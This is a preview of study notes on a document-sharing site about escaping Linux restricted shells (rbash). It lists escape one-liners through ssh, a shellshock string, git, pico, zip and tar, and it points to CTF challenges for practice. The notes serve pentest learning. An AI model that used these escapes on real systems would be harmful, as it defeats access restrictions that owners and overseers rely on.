




Study with the several resources on Docsity
Earn points by helping other students or get them with a premium plan
Prepare for your exams
Study with the several resources on Docsity
Earn points to download
Earn points by helping other students or get them with a premium plan
An in-depth exploration of Linux Restricted Shells, their usage, and various techniques to bypass them. It covers enumeration of the Linux environment, common exploitation techniques, programming languages techniques, and advanced techniques. The document also includes practical examples and references to CTF challenges.
Typology: Study notes
1 / 8
This page cannot be seen from the preview
Don't miss anything!





By @n4ckhcker & @h4d3sw0rm
[ 1 ] Introduction [ 2 ] Enumeration Linux Environment [ 3 ] Common Exploitation Techniques [ 4 ] Programming Languages Techniques [ 5 ] Advanced Techniques [ 6 ] Time to Practice
Enumeration is the most important part. We need to enumeration the Linux environmental to check what we can do to bypass the rbash. We need to enumerate :
Now let ’ s see some of the common exploitation techniques.
Now let's move into some dirty advance techniques. 1)From ssh > ssh username@IP - t "/bin/sh" or "/bin/bash" 2)From ssh2 > ssh username@IP - t "bash --noprofile" 3)From ssh3 > ssh username@IP - t "() { :; }; /bin/bash" (shellshock) 4 )From ssh4 > ssh - o ProxyCommand="sh - c /tmp/yourfile.sh" 127.0.0.1 (SUID) 5)From git > git help status > you can run it then !/bin/bash 6)From pico > pico - s "/bin/bash" then you can write /bin/bash and then CTRL + T 7)From zip > zip /tmp/test.zip /tmp/test - T --unzip-command="sh - c /bin/bash" 8)From tar > tar cf /dev/null testfile --checkpoint=1 --checkpoint- action=exec=/bin/bash C SETUID SHELL :
Root-me have a INSANE rbash bypass challenge! https://www.root-me.org/en/Challenges/App-Script/Restricted-shells Hackthebox solidstate machine! (Easy) https://www.hackthebox.eu/